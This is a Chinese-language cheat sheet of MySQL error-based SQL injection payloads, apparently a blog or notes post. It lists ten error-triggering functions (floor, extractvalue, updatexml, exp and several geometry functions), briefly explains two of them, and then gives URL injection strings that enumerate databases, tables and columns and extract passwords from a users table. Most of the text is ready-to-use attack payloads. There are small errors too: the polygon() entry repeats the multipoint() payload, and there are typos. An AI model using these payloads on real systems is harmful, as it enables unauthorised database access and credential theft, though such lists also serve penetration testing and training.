报错注入payload

报错注入常用payload

1.floor

select * from test where id=1 and (select1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

​2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

​3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

​4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

​6.polygon()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

​7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

​9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

​10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));


​每一个报错语句都有它的原理：

​	exp()报错原理：exp是一个数字函数，取e的x次方，当我们输入的值大于709就会报错，然后~取反，它的值会大于709，所以报错。

​	updatexml()报错原理：由于uodatexml的第二个参数需要Xpath格式的字符串，以~开头的内容不是xml格式的语法，concat()函数为字符串连函数，显然不符合规则，但是会将括号内执行结果以错误的形式显示报出，这样就可以实现报错注入。

​爆库：

?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) --+

​爆表：

?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema=database()  limit 2,1),1) --+

​爆字段：

?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_schema=database() and table_name='test' limit 2,1),1) --+

​爆数据：

?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) --+```